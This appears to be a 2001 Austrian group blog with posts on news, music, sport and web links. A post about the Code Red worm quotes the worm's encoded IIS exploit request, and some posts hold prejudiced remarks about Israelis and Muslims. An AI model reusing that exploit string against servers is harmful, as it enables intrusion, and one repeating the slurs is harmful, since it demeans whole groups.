    Stephen Knight, professor for English literature at the University of Cardiff in Wales, believes that Robin Hood was a tormented homosexual, banished by heterosexual society to living in a forest with his band of "merry men."

    Written in the 15th century, "The ballads could not say outright that he was gay because of the prevailing moral climate, but they do contain a great deal of erotic imagery. The green wood itself is a symbol of virility and the references to arrows, quivers and swords make it clear, too," Knight explained.

    Knight maintains that Lady Marion was an invented alibi from the 16th century to make sure Robin Hood´s real sexuality wasn´t discovered. Knight goes on to maintain that Hood´s real love was one of his followers called "Little John".

    Gay group Outrage believes the "outing" of Robin Hood is necessary.

    men in tights become real :)
    trail...  sTe  30.10.2001 16:41:31
    heute gibts den neuesten star wars trailer der episode II (kinostart 2.nov in den USA), wie auch einen english test der schwierigeren art.

    weiters ist auch folgendes color-scheme auf orf-on interessant :)

    und ueber diese browser-bugs koennen webprogrammer ein lied singen
    Seltenes Exemplar   sTe  28.10.2001 01:33:45
    sportventil meldet: ´Israel bietet heute einen Fußballer auf, der, gelinde gesagt, ein unvorstellbarer Dummkopf ist. Eyal Bercovich verweigerte einem österreichischen Reporterteam (Quelle: Tagebuch Wolfgang Winheim, Kurier) das Gespräch und das zudem mit dem Hinweis, die "Gäste" mögen sich zum Teufel scheren und daß es gleich alle wissen: Mit Österreichern rede er sowieso kein Wort. Niemals!

    Und anstatt dem Gast die verständliche Sorge zu nehmen, wird munter gezündelt, in alte Kisten des Antisemitismus gegriffen und auf diese Weise mit unlauteren Mitteln die Hochspannung ausgereizt.
    Weil aus Großvätertagen noch Schuldgefühle gegenüber der mosaischen Gemeinde bestehen, darf man scheinbar keinen Israeli kritisieren, ohne in den Verdacht der Wiederbetätigung zu geraten.
    Frei von Hintergedanken jedwelcher Art stellen wir fest: Dieser Eyal Bercovich ist ein seltenes Exemplar eines dummen Menschen, und nur zufällig spielt der Mann auch Fußball.´

    meine persoenliche meinung angesichts des unzivisierten verhaltens sowohl der fans als auch deren vorbilder, ausschluss aus der europa gruppe, und ab in den afrikanischen raum zu lybien, irak etc...
    wird wohl ein wunschtraum bleiben;


    scary...  sTe  26.10.2001 14:53:10
    gestern zum ersten mal blair witch project gesehen, und ist ziemlich eingefahren; auf der recherche ueber das gestolpert...

    zur feier des tages gibts endlich den obligaten about_me screen
    Zum Nationalfeiertag!!  bully  26.10.2001 01:46:09
    Anlaesslich des heutigen Nationalfeiertags...
    ...hier ein kleines Quiz, in dem jeder sein Oesterreich-Wissen ueberpruefen kann; is zwar von der Krone, aber tw. gar nicht so leicht;
    hab auch nur 86%... :-(
    XP LAUNCH NOW LIVE FROM NY !!!  sTe  25.10.2001 17:02:51




    live stream !!!!
    good idea:  sTe  24.10.2001 13:26:02

    sports version of the traditional muslim hijab
    list as u can....  sTe  23.10.2001 11:10:15
    listen haben begrenzte aussagekraft und sollte man nicht ueberbewerten. es gibt auch das andere extrem, naemlich, ploetzlich alles in listen packen zu wollen. wird ganz schnell langweilig, außer natuerlich, man treibt auch das voellig auf die spitze. wahrer listenmeister aller klassen ist zweifelsohne Piero Scaruffi.

    die besten rockplatten, die besten rockmusiker und die besten songs, selbstverständlich nach jahren geordnet.
    und natuerlich gibts das auch für literatur und malerei und was ich da noch alles an listen uebersehen haben mag.

    gottseidank gehts hierbei ja ueberhaupt nicht um geschmaecker...
    Coded Images Show Plans for Massive Germ Attack On U.S., Killing Millions  sTe  20.10.2001 19:37:31
    judge by yourself
    Brainless Scientific Exercise  babs  20.10.2001 00:21:48
    Wenn der Wahnsinn um sich greift: Englische Wissenschafter haben 5 Jahre lang Rinder für Schafe gehalten, Kostenpunkt: 4,78 Millionen Schilling! Im Zuge von Tests, ob BSE die Gehirne von Schafen in Großbritannien befallen hat, ist nun bekannt geworden, dass Wissenschaftler die falschen Tiergehirne untersuchten. Ob dieser Umstand wohl die Qualitaet jeglicher Testmethoden von Englands achso moderner und fortschrittlicher Anti-BSE-Strategie ein wenig in Frage stellt? Die Ergebnisse der Studie haetten heute mit dem Inhalt, dass die Rindererkrankung die so genannte "Spezies-Barriere" uebersprungen hat und auch Schafe befallen kann, an die Oeffentlichkeit gelangen sollen. DNA-Tests zeigten allerdings, dass sich das Material zur Gaenze aus Rindergehirnen ohne erkennbares Gewebe von Schafen zusammensetzte. "Jeder, der die Ergebnisse gesehen hat, war sprachlos", erklaerte Peter Smith, Geschaeftsfuehrer des staatlichen Spongiform Encephalopathy Advisory Committee (SEAC). Auch ein weiteres staatliches Labor fand in jenen Proben, die BSE-Tests unterzogen wurden, keine Anzeichen von genetischem Material, das von Schafgehirnen stammen koennte. Nachzulesen ist der Original-Artikel in den Independent News!
    2 Kleinigkeiten...  bully  19.10.2001 19:09:20
    ...für zwischendurch:
    # eine Kuckucksuhr mit gutem Geschmack
    # Wer wird Milliardär?
    mit drei netten Jokern ;-)
    have fun!!
    ERWIESEN :-)  babsi  18.10.2001 17:53:01
    die aggressivitaet der herren der schoepfung soll eine biologische ursache haben. juengste tierversuche legen zumindest nahe, dass unterschiede in der hirnchemie maenner aggressiver machen als frauen, so berichtet von us-forschern der amerikanischen physiologischen gesellschaft. die biologen der universitaet akron untersuchten die hirnchemie von aggressiven ratten und setzen dazu fremde tiere zu rattengruppen. die fremdlinge wurden in der regel ausschliesslich von maennchen angegriffen. die maennchen waren um so angriffslustiger je weniger sie vom nervenbotenstoff serotonin im gehirn hatten. ein mangel an serotonin steigert offenbar das aggressive verhalten, dazu passt auch, dass weibchen in der regel mehr serotonin im gehirn haben als maennchen. *gg*
    wenn das nicht einfach zum heulen ist!  babsi  18.10.2001 13:24:46
    wie heute berichtet, wurde der internetprovider unserer QUwAhL von der amerikanischen fachzeitschrift CTI zum "Europäischen Breitband Netz des Jahres 2001" gekuert. "CTI hat UPC Telekabel aufgrund der Leistungsfähigkeit der Technik, des Serviceniveaus, der besonderen Fähigkeit das System zu verbessern und gleichzeitig neue Services in den Bereichen Information, Unterhaltung, Breitband Internet und Telefonie anzubieten, mit dieser Auszeichnung bedacht."
    dazu die geschaeftsfuehrung: "Wir freuen uns über diese internationale Auszeichnung. Sie bestätigt, dass unser österreichisches Team zu den besten unter den Multimedia Anbietern Europas zählt".
    einige eckdaten: 2 mrd. ats jahresumsatz mit der schlechtesten breitband-performance ueberhaupt, 870 vollkommen inkompetente unfreundliche mitarbeiter und 448.000 leidgepruefte internet-abonnenten. *sigh*
    ;-)  bully  17.10.2001 17:53:30
    Noch eine ganz witzige Seite:
    Die Seite hat zur Zeit keinen Bock.
    ;-)
    XXCCC  sTe  17.10.2001 13:33:34
    "I am chaos. I am the substance from which your artists and scientists build rhythms. I am the spirit with which your children and clowns laugh in happy anarchy. I am chaos. I am alive, and tell you that you are free"
    das ist das motto anlaesslich des 20 jaehrigen jubilaeums des chaos computer clubs.
    als attraktion haben die jungs ein hochhaus gewaehlt, das mit 144 strahlern beleuchtet wird. diese daraus resultierende aufloesung von 8x18 pixeln ermoeglicht eine darstellung von riesigen icons.
    die hauptattraktion duerfte aber die damit realisierte umsetzung vom ur-computerspiel ´pong´ sein.
    weiters kann auch jeder dort seine eigenen animationen oder bildchen erstellen.
    skandal!!!  sTe  16.10.2001 16:20:21
    wired news meldet: ´RIAA wants to hack your pc´,
    und microsoft gibt gas bei der entwicklung von MSN 7 ,
    ausserdem ist heute der tag wo die star wars episode 1 DVD rauskommt, vollgepackt mit goodies und 7 neuen szenen,...
    are you sure ?!?  sTe  16.10.2001 09:49:35


    what do you think?!?
    A nuclear error...  bully  15.10.2001 20:02:33
    "... but I have no fear, cause London is drowning and I, I live by the river" (The Clash, London Calling, 1979).
    Während in London Zigtausende für den Frieden auf die Straße gehen, zuckelt ein Atommüll-Transport per Zug quer durch die Londoner Innenstadt. Und das gerade jetzt, wo eigentlich jeder damit rechnet, dass die englische Hauptstadt wohl der nächste Schauplatz eines Terroranschlags der Al Qaida sein wird.
    Aber der radioaktive Müll fährt da trotzdem ganz gemütlich auf Londons ohnehin so wackligen Bahnlinien mitten durch die Stadt: Von Hither Green und Lewisham über Kensington bis nach Willesden, also vom tiefsten Südosten, quer durchs Stadtzentrum bis in den Nordwesten der Stadt. Ein Szenario, das auch ohne Terroristen schon bedrohlich genug klingt...
    limp bizkit angeschlagen  sTe  15.10.2001 16:35:00
    wes borland und limp bizkit haben sich ´amicably´ getrennt...
    also von nun an keine masken mehr und auch mehr hoffnung dass wieder mehr kreativitaet in die songs kommt...
    dummies and more  sTe  10.12.2001 11:08:40
    eine angeblich "deppensichere" suchmaschine für - fast - alles, was wien seinen einwohnern zu bieten hat, gibt es seit kurzem im Internet: Unter citype.com koennen user nach mittagsmenüs um 50 oesis, hindi-sprechenden aerzten, beiseln mit kondom-automat oder dem naechstgelegenen bankomaten suchen.
    und um die terroristenlinks brauchen wir uns auch nicht sorgen, die gehen nicht aus: terroristornot?
    weiss wer was die 3,5-Zone ist ?!?
    some links...  sTe  10.11.2001 11:13:51
    tiny counterstrike...
    super gemezel

    lang hats ja nicht gedauert: der erste deutsche WTC-song kommt von curse. eine schlappe hiphop kacke, aber urteilt selbst...
    osama has a new friend...  sTe  10.11.2001 09:49:37
    schonunglos aufgedeckt: auf mehreren osama posters von pro-taliban demonstranten koennen wir einiges doch eher stranges erkennen: bert aus der sesamstrasse hat einen neuen freund!!! das ebendieser bert immer schon suspekt wahr, erhaertet die schlimmsten befuerchtungen!!! einen weiteren beweis von den demonstranten gibts hier. oder handelt es sich hierbei um die vielzitierten geheimen botschaften fuers terrornetzwerk... :)
    landed safely....  sTe  10.09.2001 14:45:08
    bin heil wieder zurueck aus frankfurt; ist schon ein ungutes gefuehl momentan zu fliegen, aber wahrscheinlich wird eh zuviel hineininterpretiert,...
    was solls; gesehn von der stadt hab ich nichts (auto-> plane -> taxi -> termin -> taxi -> plane ->auto ->patkplatzsuchen...)

    links fuer heute sind: http://touristofdeath.com/ - all die gesammelten bilder aus den ("fun-out-of -terror") emails der vergangenen wochen, und ein flash cartoon der ganz anspruchsvollen art
    witzig!  babsi  10.06.2001 16:21:19
    nachdem sich hier zuletzt eintraege zu eher sinnlosen seiten gehaeuft haben, kann ich endlich wieder einmal eine durchaus nuetzliche seite praesentieren. unter klassentreffen.at hat man nun die moeglichkeit nach alten schulkameraden zu suchen und verstaubte kontakte wieder herzustellen! waehrend der eingabe meiner eigenen daten, konnte ich bereits 2 alte leidensgenossen ausfindig machen - it works! ist jedenfalls eine nette idee finde ich, und die tatsache dass sich die daten aus dem klassenbuch auf namen beschraenken und keinerlei details zu eintragungen bezueglich fehlverhaltens, nichterscheinens etc. von seiten der schulbehoerde nachgetragen werden, ist in anbetracht des bereits heranwachsenden bzw. rasch nahenden nachwuchses auch eher von vorteil :)!
    Tiscali überträgt U2-Konzert im Web  sTe  10.06.2001 14:33:28
    Der italienische Internet-Provider Tiscali überträgt ein Konzert der irischen Rockband U2 am 11. Oktober live im Internet. Wie Tiscali-Sprecherin Marina Baader am Freitag mitteilte, wird Tiscali dabei mit der offiziellen Homepage der Band http://www.u2.com zusammenarbeiten. Dritter im Boot ist Real Networks , das für die Technik der Streaming-Video-Übertragung zuständig ist. Den zum Empfang des Konzerts erforderlichen Media Player gibt es auf der Real-Seite gratis. Wer jedoch außer einer mäßigen Ton-Übertragung auch bewegte Bilder in Echtzeit sehen will, sollte mindestens auf einen ISDN-Zweikanal-Anschluss zurückgreifen können, besser noch auf einen Breitbandzugang per DSL.

    Da das Konzert am 10. Oktober (Ortszeit) in der University of Notre Dame im US-Bundesstaat Indiana über die Bühne geht, beginnt die Live-Übertragung im deutschsprachigen Raum am Folgetag morgens um drei Uhr. Wer verschläft, kann sich am 11. Oktober ab 21 Uhr eine Wiederholung ansehen. Zwar können die Surfer das Ereignis auf dem Tiscali-Portal kostenlos verfolgen, doch Gespräche mit den Bandmitgliedern und der Zugang zu einer speziellen Rundumsicht-Kamera bleiben den Kunden, die sich über eine Tiscali-Leitung ins Web einwählen, vorbehalten. Die Hintergrundinformationen lassen sich nur auf der offiziellen Seite der Band abrufen. (pte)
    ein kleines sammelsurium an peinlichkeiten bei der namensgebung von auto modellen...  sTe  10.02.2001 17:12:28

    ford praesentierte 1971 den "pinto" was auf brasilianisch "kleiner pimmel" heisst;
    nissan zeigte sich mit dem pickup "fiera" auch nicht gerade von der innovativen Seite: "fiera" heißt übersetzt "haessliche, alte frau";
    toyota hatte sich auf dem franzoesischen markt mit problemen mit dem "MR 2": schnell ausgesprochen wird aus dem sportcoupé der toyota "scheisse";
    mitsubishi leistete sich mit dem "pajero" in spanien einen ausrutscher: "pajero" = "wichser";
    und im finnischen wird aus dem "uno" von fiat, ein "trottel";

    aber ich glaub auch mercedes hatte mit dem "vito" in finnland probleme...
      sTe  10.01.2001 13:55:32
    a weird story gibts hier noch;
    to hell with bad browsers  sTe  10.01.2001 12:13:11
    The standards have been around for years. Browsers that support them have been around for six months to a year. If not now, when?
    It typically takes 18 months or longer for web users to upgrade their browsers. Many still use browsers, like Netscape 4, that date back to 1997. These folks will only upgrade if we give them a reason to do so.
    If enough of us do this, the 18 month pregnancy can be shortened, ushering in a web built on common standards that much sooner. Seems like a worthy goal to us.

    Why cant you offer backward compatibility?
    Old software does not support standards. It would be swell if we could have backward compatibility and pure standards compliance. But we cant. We have to choose. For years, most of us have chosen backward compatibility. But is this really the best choice?
    For years, we have been taught to be good little web designers, building sites that work in browsers that dont. Each site we build the old-fashioned way becomes one more dung heap of bad code, one more web destination that will eventually stop working as browsers and standards evolve.
    The longer we do it, the more doomed sites proliferate. Thousands of new sites premiere every day. Most of them are built to support bad browsers intead of standards. Its an epidemic. Enough already. We finally have good browsers. Lets use them.

    this article was published @ a list apart
    supporting webstandards.org
    und es gibt sie doch....gerechtigkeit!  sTe  10.01.2001 22:01:56
    nachdem mika in die 2. startreihe strafversetzt wurde (warum weiss wohl kaum einer; offizieller grund waren laeppische 5 sec die er das warmup zu frueh began)...ging der mickey mouse maessige grand prix von amerika an den pechvogel der saison;
    schoen war der gp lange nicht, aber als in der letzten runde rubinhos motor abstotterte...




    war die bahn frei...



    und so schaun verlierer aus...



    wir freun uns...
    "ein ueberdimensionales meerschwein frisst die erde auf"  babsi  26.09.2001 18:10:23
    480 seiten, ca. 2500 abbildungen, dm 98,00 - euro 50,11 was kann das sein? muss wohl die eben erschienene biographie der besten band der welt sein. das zweifelsohne ziemlich teure druckwerk wurde kuerzlich im rahmen einer aussergewoehnlichen lesung in weimar praesentiert! wie eigentlich nicht anders zu erwarten, war die lesung die reinste kabarettvorstellung, die selbst ueberzeugte nicht-fans zum lachen gebracht haben soll. in wien ist aehnliches fuer morgen im cine-star vorgesehen.
    nuetzliches:  babsi  21.09.2001 20:06:42
    powerquest bietet bis 26. oktober das ausgesprochen nuetzliche tool eines daten-rettungs-programms kostenlos zum download an. die fuer die installation noetige seriennummer wird auf der website angegeben. lostandfound soll sogar daten von einer geloeschten partition wieder herstellen koennen. das beste wird sein die 3,5 MB downzuloaden und reinzuschauen, wenn es haelt was es verspricht, ist es bestimmt sehr praktisch!
    pet of the day  sTe  19.09.2001 11:24:10
    kann natuerlich nur der afghane sein.
    dieses kann wie so viele andere bewohner der region nichts fuer den momentanen wahnsinn.
    fuer alle amerikanos gibts hier genau das richtige...
    interessant sind auch die statistiken auf googles zeitgeist.
    interessant auch dieses posting eines gar aufmerksamen typs...
    und jetzt die frage zum tag (wurde gestern in kleiner runde andiskutiert):
    ist der islam mit dem nationalsozialstischen gedankengut vergleichbar ?!?
    A.I. - viel laerm um nichts!  babsi  18.09.2001 17:17:34
    Artificial Intelligence beginnt meiner meinung nach durchaus ganz gut, setzt sich mit nicht unwesentlichen und teils auch tiefgruendigeren aspekten der integration von vermenschlichten robotern in unserem alltag auseinander. leider driftet der streifen dann immer mehr in eine reine maerchenstory ab, der jeglicher tiefgang und die ernsthafte auseinandersetzung mit der thematik vollkommen abhanden kommen, dafuer aber spielbergs dreamworks ihrem namen gerecht werden koennen. das puppentheater endet schliesslich zwischen aliens, die mit ihrer gutmuetigkeit noch einmal schnell den druck auf die traenendruesen erhoehen sollen. von statten geht der nicht enden wollende schluss des maerchens am versunkenen fusse der einstigen twintowers in manhattan, was die meisten kinobesucher inzwischen wohl erheblich mehr zum nachdenken anregen wird als dieser film.
    einzig die besetzung der rollen des david mit haley j. osment and jene des robolovers mit jude law half ueber die ideenlosen laengen dieses films, der bereits nach 30 minuten auf inhalte verstaubter hollywoodkisten zurueckgreifen muss, hinweg.
    invade their countries, kill their leaders, and convert them to christianity...  sTe  18.09.2001 15:29:50
    dies mag zwar etwas hart sein, auch fuer meinen geschmack, und soll auch keinesfalls eine diskussion ausloesen.
    in anbetracht der strategischen und (un)menschlichen ueberlegungen a la (...) alles plattmachen, was einen turban traegt, moechte ich jedoch auch auf eine in diesen zeiten oft vergessene qualitaet des verdaechtigen landes hinweisen...

    auf cnn.com gibts ein taliban-quiz; gefragt wird unter anderem nach der kindersterblichkeit und wieviele afghanen in fluechtlingslagern in pakistan leben. ...vor dem kommenden angriff wohlgemerkt.
    agony  sTe  09.12.2001 08:54:39
    as a mark of respect to the people who have suffered a terrible tragedy in The United States of America i decided to stop postings for 24 hours and i also call for all visitors to cease posts of respect for the many people who lost their lives.
    i feel for everyone that has in someway been affected by this terrible tragedy.
    nackte tatsachen!  babsi  09.11.2001 13:41:51
    die kanadischen nakednews.com schafften den sprung ins fernsehen - wir gratulieren! die hochqualifizierten moderatoren die sich beim verlesen der nachrichten ausziehen, werden kuenftig auch in einer 45-minuetigen sendung im kanadischen kabelfernsehen zu sehen sein. wer sich nun fuer news, transportiert von naked gretchen, devon, derek und co, interessiert, kann sich im pay-tv fuer 2,65 dollar je folge informieren. nach eigenen angaben verzeichnet die seite jeden monat sechs millionen zuseher, das sind immerhin ueber zwei drittel der CNN-visitor.
    welch geistreiche innovation!
    september is here...  sTe  09.03.2001 10:24:38
    nach einer doch eher ansprechenden ersten halbzeit, begannen wieder einmal die leiden des otto.b ich frage mich was, in anbetracht der aufloesungserscheinungen gegen ende, (oder ob ueberhaupt irgendetwas) in den koepfen einiger balltretender herren vorgeht.
    ein trost hingegen ist das ergebnis oder fast schon zu sagen das ereignis im münchner olympiastadion!!!
    viel erfreulicher hingegen ist die neue bush. golden State (kommt am 23. Oktober) ist mit sicherheit die abgerundetste, vollkommenste scheibe der briten. speed kills ist nicht nur ein titel sondern auch direktive, aber auch die langsamen songs habens in sich...
    wirklich mehr als empfehlenswert!
    die gerechtigkeit hat einen neuen namen - LIVERPOOL!  babsi  25.08.2001 15:41:10
    die wohltat nach dem niederschmetternden ergebnis der championsleague 00-01: liverpool gewinnt den supercup gegen die schlappe bayern-elf mit 3:2!!!
    olli kahn, der tags zuvor im rahmen der uefa-gala, die an schlechter stimmung und peinlichkeiten die krone-gala unglaublicherweise noch um ein vielfaches uebertroffen hatte, mit zig auszeichnungen bedacht wurde, durchlebte gleich 3x das schicksal eines schlechten goalies und muss mit seinen kollegen des feindbildes nr. 1 das erneute scheitern im supercup hinnehmen. die siegreichen englaender kassierten an die 25 millionen und die deutschen unzaehlige negative schlagzeilen - so mag ich das!!!
    forget harley , want this....  sTe  17.08.2001 14:23:24
    die f22-raptor ist noch schneller ...
    making metal do things Its never done before  sTe  13.08.2001 16:15:20
    ...genauer gesagt handelt es sich hierbei um die VRSCA V-Rod.
    nein, ich hab sie mir nicht gekauft :(, werd ich auch nie, aber schoen ist sie schon, und wie !!!

    HELLO! Welcome to http://www.worm.com! Hacked By Chinese!  sTe  09.07.2001 00:45:55

    nice try - but we resisted !!! :) code red ist trotzdem nicht zu unterschaetzen...

    /default.ida?NNNNNNNNNNNNNNNNN
    NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
    NNNNNNNNNNNNNNNNNNNNNNNNNNNN
    NNNNNNNNNNNNNNNNNNNNN
    NNNNNNNNNNNNNNNNNNNNN
    NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
    NNNNNNNNNNNNNNNNNNNNNN
    NNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u780
    1%u9090%u6858%ucbd3%
    u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8
    190%u00c3%u0003%u8b00%u531
    b%u53ff%u0078%u0000%u00=a
    working weekend and more...  sTe  08.02.2001 09:38:47
    letztes wochenende verschlugs mich zum ersten mal nach lech am arlberg, wo ich gemeinsam mit meinem italienischen kollegen maurizio eine homepage gestalten sollte.
    das ergebnis wird in etwa so aussehen (Lenai & Linai). hierbei handelt es sich um eine ortsansaessige textilkuenstlerin die alles moegliche aus filz, loden und mehr herstellt.
    das wetter war traumhaft, die berge gnadenlos, konnten uns aber trotzdem nicht unterkriegen.
    photos gibts hier (lech 2001),...wir kommen wieder !!!!
    als der orf mit einer tradition brach...  babsi  08.01.2001 17:35:11
    aeusserte sich das in phase1 in form des jungen wolfgang a. und der dynamischen doris g. und zwar taeglich um 20.14 auf orf1. gerade als wir uns nach 11 monaten an die bunten voegelchen anstatt der verwelkten butterblumen die nur noch am 2er freundlich laecheln duerfen, gewoehnt haben, die schicken lila hemden praesentiert von herrn angermueller der stoff wurden den wir taeglich brauchen und die geschmackvollen schlangenplastik-tops von frau golpashin nahezu jede junge frau in die unzaehligen filialen diverser stangenmodehersteller trieben, soll nun ab september phase2 in kraft treten. wer von uns haette es sich traeumen lassen dass eine zeit kommen wird da anstelle der programmsprecherInnen die noch moderneren promotion-trailer die zuseher von orf1 und orf2 ueber die nachfolgenden sendungen informieren werden? lasset uns die letzten tage dazu nutzen um jenny, marie-christine, heilwig und auch unseren jungen bruder wolfgang und schwester dorli wissen zu lassen, dass wir sie vermissen werden – BLOW! :-)
    Danke, Herr Samaranch!  bully  13.07.2001 18:25:00
    IOC-Präsident Juan Antonio Samaranch hat es nun also wirklich geschafft und der Mehrheit der Mitglieder des IOCs in Moskau seinen Willen aufgedrängt. Es war der große Wunsch des senilen Spaniers, der am Montag nun endlich abgelöst wird, dass die Olympischen Sommerspiele 2008 in Peking stattfinden. Schon im ersten Wahlgang erhielt die chinesischen Hauptstadt mehr als die mindestens erforderlichen 54 Stimmen. Allein in den letzten drei Monaten wurden im Reich der Mitte 1.780 Todesurteile vollstreckt, tagtäglich werden die Menschenrechte der Tibeter, Uiguren, Mongolen und der chinesischen Demokraten mit Füßen getreten, das wirtschaftlich potente Taiwan wird nach wie vor als "abtrünnige Provinz" bezeichnet. Am perversesten ist aber wohl die Tatsache, dass die Beach Volleyball - Turniere am Tian An Men - Platz (Platz des Himmlischen Friedens) stattfinden werden, eben jenem Platz, auf dem chinesische Truppen zwischen 20. Mai und 4. Juni 1989 ca. 5000 für Frieden, Freiheit und Demokratie demonstrierende Chinesen brutal niedergemetzelt und ermordet haben...

    War das denn wirklich nötig, Herr Samaranch???
    GRUESSE aus BARCELONA  sTe  07.03.2001 16:02:13
    gigantomanie pur, microsoft rulez !!!!
    ein weiteres kapitel ueber, dinge auf die wir...  sTe  26.06.2001 07:59:50
    ...schon sehnsuechtigst gewartet haben: die  NASA hat einen screensaver herausgebracht. das allein ist ja noch nichts besonderes, jedoch besitzt dieser die moeglichkeit sich aktuelle bilder aus dem internet zu besorgen, und so sonne, mond und sterne herzuzeigen. (aufgenommen vom forschungssatellit SOHO)...

    und das ist genau das was wir brauchen: ein programm das waehrend meiner abwesenheit eine verbindung ins internet aufbaut und bilder anzeigt die ich mir mangels anwesenheit eh nicht anschauen kann :)) oder hab ich den sinn eines screensavers immer noch nicht verstanden :)
    1x mehr an den kopf greifen!  babsi  21.06.2001 11:11:59
    die bundesliga und rapid feiern dieser tage ein jubilaeum – rapid wurde vor 60 jahren im kampf gegen schalke 04 deutscher meister. waehrend auf der rapid homepage zumindest erwaehnt wird, dass damals „eine schlimme zeit, der weltkrieg tobt“, was durchaus keine entschuldigung fuer das loben und preisen dieses mehr als zweifelhaften jubilaeums darstellt, wird auf der offiziellen website der oesterreichischen bundesliga ueberhaupt nur von einem „denkwuerdigen finalspiel im berliner olympiastadion...“ berichtet. man koennte meinen, die bundesliga ist nichts als ein wurmfortsatz der huetteldorfer antikicker. ein kommentar muss noch sein! wem haben die anhaenger dieses vereins diesen „grandiosen“ sieg zu verdanken? exakt, dem schussgewaltigen kapitaen „bimbo binder“! UND AUS!
    seiten auf die die welt gewartet hat  sTe  15.06.2001 14:10:37
    nicht dass irgendeiner glaubt ich haette nichts zu tun, im gegenteil,..aber in anbetracht des wirklich hohen informationspotentials der folgenden seiten, moechte ich sie niemandem vorenthalten...:))
    das erste-deutsche-vogelstimmen-online-archiv und die fischbase mit 25,340 Species, 71,000 Synonyms, 110,000 Common names,
    28,000 Pictures, 21,000 References, 550 Collaborators, 1 million Hits/month...WOOOOOW
    Einfach zum Nachdenken!  babsi  06.11.2001 13:52:53
    (derstandard.at) Der Bombenattentäter von Oklahoma, Timothy McVeigh, hat sich am Abend vor seiner Hinrichtung gut gelaunt gezeigt. "Er ist erstaunlich guter Dinge, gesprächig, freundlich und hat seinen Sinn für Humor bewahrt", sagte einer der Anwälte McVeighs am Sonntag nach einem Besuch bei dem zum Tode Verurteilten. McVeigh habe gelacht und Witze gemacht. Die Exekution mit der Giftspritze ist für Montag 7.00 Uhr Ortszeit (14.00 Uhr MESZ) angesetzt.
    McVeigh ist der erste Todeskandidat seit 1963, der nach Urteil eines Bundesgerichts hingerichtet wird. Wegen des Anschlags auf ein Bundesgebäude in Oklahoma-City am 19. April 1995 war der Bund und nicht der US-Staat Oklahoma für die Strafverfolgung des Verbrechens zuständig. Die Todesstrafe gibt es seit der Wiederzulassung durch das Oberste Gericht 1976 auf Bundesebene sowie in 38 der 50 US-Staaten.
    Aus kid A wird nicht kid B...  sTe  06.08.2001 23:29:34
    klingt ungewohnt? ist es auch. "amnesiac" ist anders als "kid A", besteht aus vielen gefuehlskategorien und ist keine zwingende einheit.
    "amnesiac" klingt duester, melancholisch und macht einsam. und dies immer mit der noetigen dramaturgie. es herrscht trauerstimmung bis zur schieren verzweiflung; die sounds schwirren vorbei und zwinkern trotz ihres pessimismus manchmal fast freundlich. die anti-rockstars aus oxford haben wieder ihre eigene welt geschaffen, in atemberauschender schoenheit; "amnesiac" verwirrt, "amnesiac" entgeistert, "amnesiac" fesselt und "amnesiac" begeistert. "amnesiac" ist nicht "kid B". "amnesiac ist ganz klar "KID A1"!!!!!!!!
    direkter gehts nicht...  sTe  06.07.2001 15:47:58
    jetzt gehts los,...file sharing der kompletten art:
    "direct connect" ist ein perfektes, community-orientiertes, offenes, user kontrolliertes peer-to-peer netzwerk.
    jeglichstes file kann damit geshared und somit gefunden werden, egal ob anwendung, mp3, videos, wasauchimmer;
    das interface ist eines der schoensten seiner art, und ausserdem verdammt einfach zu bedienen...
    na hoffentlich setzt sich der spass durch, ich bin auf jedenfall begeistert....
    news, news, news....  sTe  25.05.2001 15:40:21
    ...nach einem traumhaften urlaub hat uns das normale leben wieder.... sollte man denken - wenn da nicht diese eine wundervolle ueberraschung waere :)
    liebe feelosophees,  babs & sTe  05.02.2001 23:48:16
    hiermit verabschieden wir uns fuer die naechsten zwei wochen, auch die redaktion muss sich einmal erholen und raum fuer mehr kreativität schaffen.
    wir wuenschen euch zurueckgebliebenen :-) vierzehn schoene tage, sei es nun in der provinz oder in einer der zahlreichen metropolen! fiiiish!
    last calls no1  sTe  30.04.2001 11:09:48
    ...nach aufreibenden letzten wochen ist es endlich vollbracht: die Memphis Airbase ist online. zwar noch nicht mit allen features aber doch im grossen und ganzen fertig...
    und nochwas: dank der doch eher groesseren anzahl an stunden die fuer dieses projekt draufgegangen sind, konnte ich, durch verstaerkten musik-bedarf, einen test der gaengigen mp3-download-software durchfuehren, welcher in folgendem ergebnis resultiert:
    1.platz (mit Abstand): audiogalaxy.com
    2.platz bearshare
    3.platz napster
    4.platz aimster
    nik, kaz, ato und der oefb  babsi  27.04.2001 11:20:41
    was die 3 pokemon-aehnlichen maskottchen der fussball-wm 2002 mit dem oefb zu tun haben? eigentlich koennte man angesichts der mehr als blamablen leistung unserer national-elf annehmen garnichts, aber man hoere und staune: dem einzigen der englischen sprache maechtigen funktionaer des oefb ist es gelungen, diese bunten kerlchen als sturmspitzen und mittelfeldspieler fuer unser nationalteam zu gewinnen! schon beim naechsten einsatz in drei monaten werden 9 oesterreichische flaschen um die 3 frisch eingebuergerten, einst asiatischen stofftiere - michl, franzi und seppi - ergaenzt. es kann nur besser werden :-)!
    30 und ein bisschen weise?  babsi  19.04.2001 18:39:50
    angesichts der sich in letzter zeit haeufenden 30er-festln dachte ich mir es waere vielleicht fuer den einen oder anderen interessant, sich langsam wegen einer geeigneten altersvorsorge umzusehen :-), im online-trend finden sich zu diesem thema eine menge nuetzlicher informationen! jederzeit bereit fuer fragen und antworten bezueglich geldanlage ist auch ganz bestimmt monsieur hoetzinger aka hons *gg*! sollten alle stricke reissen und keine geeignete anlageform gefunden werden koennen, bleibt dann immerhin noch eine option – logisch, wie kann der hart erarbeitete rubel (einen hoeheren wert hat der euro im moment nicht wirklich!) besser investiert werden als in ein kuehles, frisch o-zapftes bier – prost!
    BSE-bomber: rettet die rindviecher :-)  babsi  04.12.2001 14:51:46
    bei dem wirklich entzueckenden, absolut gewaltfreien (ist trotzdem bzw. eben deswegen sehr gut :-)!) spiel besteht die aufgabe darin, kuehe mit dem helikopter einzufangen und ins quarantaenelager zu bringen. dort warten die wahnsinnigen rinder, die wirklich ausgesprochen suess aussehen, auf ihre heilende injektion.
    wer sich gerne zur abwechslung mit dem retten der kuehe, anstatt mit den seit wochen anhaltenden schlachtungen beschaeftigen will, sollte sich unbedingt dieses bse-demo downloaden und spielen.
    der placebo-effekt!  babsi  04.12.2001 10:37:15
